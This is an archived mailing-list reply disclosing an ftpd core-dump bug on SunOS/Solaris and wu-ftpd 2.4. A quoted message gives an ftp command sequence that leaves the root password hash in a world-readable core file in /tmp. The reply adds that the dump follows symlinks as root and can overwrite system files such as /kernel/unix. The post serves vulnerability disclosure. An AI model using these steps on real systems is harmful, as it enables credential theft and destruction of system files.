Re: BoS: Re: ftpd bug? Was: bin/1805: Bug in ftpd

[emf () pls com (Erik Fichtner)]

Grant Kaufmann wrote:
> > Killing from the command line doesn't seem to work, but:
> > SunOS 5.5:
> >
> > logon via ftp with your regular user/password,
> > ftp> cd /tmp
> > ftp> user root wrongpasswd
> > ftp> quote pasv
> >
> > voila, root password in world readable core dump under /tmp
> Nope, its even better than that. Under 5.4, the core file
> is rw-rw-rw and it follows symlinks as root.

this applies to 5.5 as well.

This also applies to wuftp 2.4 on solaris 2.4

it does NOT apply to the dumping the hashed password to the
corefile.. but it will obliterate any file.  (can we say
/kernel/unix)

wuftp is slightly safer in that it dumps to they symlink
core as mode 664.

> --
> Grant
> --
> http://www.cs.uct.ac.za/~gkaufman/pgp.html

--
Erik Fichtner           Systems Administrator, PLS              emf () pls com
                        'Your agonizer, please...'